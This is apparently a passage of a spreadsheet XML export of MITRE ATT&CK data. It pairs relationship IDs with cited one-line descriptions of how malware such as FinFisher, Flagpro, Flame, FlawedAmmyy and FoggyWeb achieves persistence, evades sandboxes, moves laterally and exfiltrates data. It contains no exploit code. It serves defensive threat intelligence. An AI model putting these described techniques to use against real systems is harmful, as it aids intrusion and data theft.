    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the current username and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--427a9eb9-659d-433c-9e2c-9a66d115a9a3</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--4887f5b0-45ed-4848-a984-4e72263e33d8</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses command line for execution.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--fdf9f632-03ce-4e8c-88bf-3798bb7f5ef4</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use COM hijacking to establish persistence.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--8604868a-8226-4c03-a5b2-bedfc4020865</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can delete files from a compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--ccb912dd-ed1f-4844-9bc0-75a033fa8813</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--d52b8760-abba-46f0-8c82-653b95cb2775</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can run &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to check if a mouse is present.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--6b15c0bd-7b39-408b-91fa-cf942a52a933</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use PowerShell scripts for execution.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--a08b1776-efe3-4304-9dba-dc977fc934cd</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has checked for AV software as part of its persistence process.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--700e46f0-0c55-4b5b-8f12-d4ead13b03d3</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</si>
  <si>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</si>
  <si>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relationship--c5d72f44-5b9c-4927-a232-6cd81fdbcc13</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to determine the OS version of the compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--c6172742-12ae-4d3f-9fd6-194cfdc93de7</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has the ability to use Visual Basic scripts for execution.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--699bbb0a-3b06-4def-ad89-994c8981fa28</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) can dump Windows password hashes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--f1d5a985-406e-4b03-9f55-2706a2adba92</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) contains junk code in its functions in an effort to confuse disassembly programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--b10b7d66-3bee-4ebc-98c2-2eec2259e19e</t>
  </si>
  <si>
    <t>12 August 2019</t>
  </si>
  <si>
    <t>Some [FinFisher](https://attack.mitre.org/software/S0182) variants incorporate an MBR rootkit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--753093c1-6586-4a17-9068-25648111ef33</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) performs UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--659462ab-e1ed-4370-9810-aa3efcb060bf</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) clears the system event logs using &lt;code&gt; OpenEventLog/ClearEventLog APIs &lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--6c7285ce-7ae2-4d85-a629-4f6eab659fb1</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) hooks processes by modifying IAT pointers to CreateWindowEx.(Citation: FinFisher Citation)(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>relationship--3b4f48d3-eb5d-4d7e-9f0b-86f68951207d</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses DLL search order hijacking.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>relationship--328825fa-a589-4c16-abef-7e3663f1f6ec</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses DLL side-loading to load malicious programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--bfb99438-5a97-47e1-921f-dbf8863799ed</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) extracts and decrypts stage 3 malware, which is stored in encrypted resources.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--d4bffc31-3d7a-4f05-a85d-fdaaaa70853d</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) injects itself into various processes depending on whether it is low integrity or high integrity.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--4d0ea359-36b3-46f8-818a-5aaff3de574a</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) enumerates directories and scans for certain files.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--714ecf14-6200-4edf-9a9c-dd9830831266</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</si>
  <si>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</si>
  <si>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relationship--fa5b5933-f9e3-4bbb-b734-f1c5984ded97</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--c7c24601-7125-4079-9d48-138594b3f86c</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</si>
  <si>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</si>
  <si>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relationship--f75caad1-161a-4833-b3ec-f4538e1603fe</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--d878a055-0053-45a9-a724-52f59e0486c7</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--79cebb53-3154-4512-9343-2942b1f72ff5</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) establishes persistence by creating the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\Run&lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--0f60b67a-c6a5-4855-991e-00ec6fe5f9ac</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</si>
  <si>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</si>
  <si>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relationship--0c1f6d5f-3094-4834-94a9-5a615e7c319c</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) probes the system to check for antimalware processes.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d9b8e0cf-8906-45a4-8dd2-5ef9971e1a6d</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses a custom packer.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>relationship--4636d747-9b81-4139-b86d-6e4edbc4111e</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--2af8a4f4-fcac-4081-86f9-ba74140580dc</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks if the victim OS is 32 or 64-bit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--db46b437-c406-4c36-a0fe-bf1f2c32a6fe</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses token manipulation with NtFilterToken as part of UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--0b10d358-b59f-4fc0-8eaf-37352be9c80b</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) creates a new Windows service with the malicious executable for persistence.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>relationship--9ee064f9-05bc-4b9e-ad95-d1ae4f1c048a</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses Python code to deobfuscate base64-encoded strings.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--347ee2ed-7def-45ac-9935-063a679859ae</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obfuscates strings with base64 encoding.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--3c92a16b-9f72-4f79-a656-e79c6c04e48f</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains a list of running processes.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--4322dad3-453f-4af5-bd1c-0099baaf2b61</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) creates a Registry Run key to establish persistence.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--11471266-5136-4cd8-a1ef-d847f33ab6de</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains victim Microsoft Windows version information and CPU architecture.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--854fd292-dbaf-4112-96b2-824364c82a4c</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8ee8bf1b-acbc-4138-a7dc-667b251fd826</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can check the name of the window displayed on the system.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--149d6bae-0322-40b2-a361-e0d94db0601e</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can collect data from a compromised host, including Windows authentication information.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--6b07ae79-4f29-499a-a25e-882b8c624086</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has exfiltrated data to the C2 server.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--9ed1920b-595b-40ae-954c-1b4769eac07e</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--e2d28250-862e-4dd5-8712-aa6b6782b088</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can download additional malware from the C2 server.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--82ce210f-a994-4541-b62f-40ead02ad202</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;net localgroup administrators&lt;/code&gt; command on a targeted system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--8f5db833-979f-43c1-a28c-8a9ef3bb7980</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has relied on users clicking a malicious attachment delivered through spearphishing.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--7e6827aa-fd5f-4c32-b06e-60e9ee71bd53</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can download malicious files with a .tmp extension and append them with .exe prior to execution.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--702c674e-110e-4f6d-9117-be1803d84e88</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--d0722ad7-32c5-4249-90b2-e76bea63ea59</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute `net view` to discover mapped network shares.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--a9df6783-2c1d-417b-8cee-d9738416a183</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been delivered within ZIP or RAR password-protected archived files.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--6610cf22-0a8c-4c30-bc6f-817b8cf29e61</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;tasklist&lt;/code&gt; command on a compromised system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--f14f7949-81d3-4730-91cf-263ef8487708</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has dropped an executable file to the startup directory.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--83561fd5-18cf-47df-a412-45614f3142bd</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;net view&lt;/code&gt; on a targeted system.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--8c155a65-b89f-44aa-b4c0-1374208a3fed</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has the ability to wait for a specified time interval between communicating with and executing commands from C2.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--15d6c37f-f34f-4431-b73c-0a1f0f64e37a</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been distributed via spearphishing as an email attachment.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--db142c7e-9145-477a-bc52-1545bcacee83</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has encoded bidirectional data communications between a target system and C2 server using Base64.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--118c427e-fcd2-4464-a32a-a6edb0d6ead5</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--1a67b676-a119-4968-a0ce-9f6f48b481de</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;ipconfig /all&lt;/code&gt; command on a victim system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--b9c68fbb-45d5-41d3-9bfb-e591d38af920</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;netstat -ano&lt;/code&gt; on a compromised host.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--e73da29b-075c-4c77-a3e4-16953d51582b</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;whoami&lt;/code&gt; command on the system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--a0b16d25-48f0-42e5-be32-8b831e18c869</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can execute malicious VBA macros embedded in .xlsm files.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--4f5f0017-9924-4737-aa42-b4cbbce20099</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can communicate with its C2 using HTTP.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>relationship--85eeec51-34a1-421f-aae2-892843dfd19d</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can use `cmd.exe` to execute commands received from C2.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--64d09ca0-3fc6-4be1-9c77-bd01ac3a3947</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can record audio using any existing hardware recording devices.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>relationship--07d16181-ba82-42c8-a67b-8d7d5adef52d</t>
  </si>
  <si>
    <t>06 June 2019</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use Windows Authentication Packages for persistence.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>relationship--c8ad1abb-cbe4-4172-9faa-4b999054dd7b</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</si>
  <si>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</si>
  <si>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relationship--2858ec3b-5814-4515-9dda-f8009fbf4cd3</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>relationship--052b685c-6d95-4a98-86f1-4c9bb39a398c</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>relationship--57e6eba5-cb21-4a0d-b524-4981f49037b1</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957</t>
  </si>
  <si>
    <t>Rundll32.exe is used as a way of executing [Flame](https://attack.mitre.org/software/S0143) at the command-line.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>relationship--ced15447-281b-4d92-941e-b5df9747a3d5</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can take regular screenshots when certain applications are open that are sent to the command and control server.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>relationship--7ba62129-a4ba-42b4-9971-4a650682cb52</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) identifies security software such as antivirus through the Security module.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>relationship--4a9f7553-b3ee-405b-9c81-f487b4bed868</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect clipboard data.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--e2335bc2-8ad0-484d-89b5-70b05a131296</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) may obfuscate portions of the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--efd7f218-0e23-458b-be17-afad9545fa25</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has collected information and files from a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--d5e027a9-7c0e-42f1-bf51-5432980dbf77</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has sent data collected from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--9b77175f-5bf4-4f4e-a064-55d88babf1fe</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can execute batch scripts to delete files.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--f2918cdd-b62f-413c-beba-dd95f0a75c3f</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can transfer files from C2.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--9f43174e-9fec-447c-b5d9-12b348447853</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect mouse events.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--ae3897f5-099d-46b0-b645-81a9a45445fa</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect keyboard events.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--1ff4d9b1-3a94-4bde-87cf-d4f19ac1ef50</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the privilege level of the victim during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--f54cba45-e641-49e0-b015-b5f6f8a05002</t>
  </si>
  <si>
    <t xml:space="preserve">[FlawedAmmyy](https://attack.mitre.org/software/S0381) has been installed via `msiexec.exe`.(Citation: Korean FSI TA505 2020) </t>
  </si>
  <si>
    <t>relationship--f0966da3-d23d-4949-99d6-ddc680f4a5f3</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect if a usable smart card is current inserted into a card reader.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--97361e60-4c54-48f6-a661-e3bd36b9745e</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used PowerShell to execute commands.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--69422dae-3bc2-41a9-bfc8-6ef431f807c6</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--442ff7a8-149b-4d26-933a-033ba25b9838</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `rundll32` for execution.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--8b587fdb-cae2-4c5f-b434-86ad325077d2</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can capture screenshots.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--9cb17d40-fe0f-4b68-bac7-78778c8772d7</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect anti-virus products during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--7da97f5c-fd61-4181-9775-47abbd5250c0</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used SEAL encryption during the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--bc4b8f68-3570-474e-8157-225afddda463</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect the victim's operating system and computer name during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--0d95b411-1192-42d0-96b1-98fe18742a04</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the current user during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--2b8418de-6474-49e2-84f0-01ffe6c07a42</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--9a5d5258-e0c3-4d73-9d5f-122ed3d7d920</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `cmd` to execute commands on a compromised host.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--07945166-0096-44fb-855e-a25313ca2b1d</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) leverages WMI to enumerate anti-virus on the victim.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>relationship--38f54e6f-502c-4af5-9867-fa9fb8381662</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) encrypts its C2 configuration files with AES in CBC mode.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--67dbfc12-982f-4d14-a3d7-efa45644ecf3</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</si>
  <si>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</si>
  <si>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relationship--2a9fde8d-dbec-42e9-ad73-02f80e765a91</t>
  </si>
  <si>
    <t>16 November 2021</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--990e64f6-6a47-410c-9557-a17e96a60755</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--40a32109-3cae-4f00-ac82-d8da57ce0eeb</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--9d7577f9-2003-4cbc-b7cb-58f2dc20714c</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve configuration data from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--52e9ca8d-a778-46d1-9521-743a8e47c503</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--23679538-e90c-430d-b375-6d8bbf8ec723</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can remotely exfiltrate sensitive information from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--2c93a27a-c6f0-46b9-857b-b746e2204670</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can check for the [FoggyWeb](https://attack.mitre.org/software/S0661) backdoor .pri file on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--b3c50e22-4f4c-490c-9284-0af1c0543821</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--998c449f-ef46-4f42-a6a4-bd025338584e</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--6c0510e4-a642-4dfe-9632-dff6f97e09de</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</si>
  <si>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</si>
  <si>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relationship--a0a166b9-3aec-4dbe-b786-23f6439943eb</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</si>
  <si>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</si>
  <si>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relationship--85425f5c-a65e-43fe-8c69-594425b6608f</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</si>
  <si>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</si>
  <si>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relationship--98b8b974-ac4f-4286-b657-f34f813c1d12</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) has been XOR-encoded.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--594a13ec-9187-4410-95a2-99684183200f</t>
  </si>
  <si>
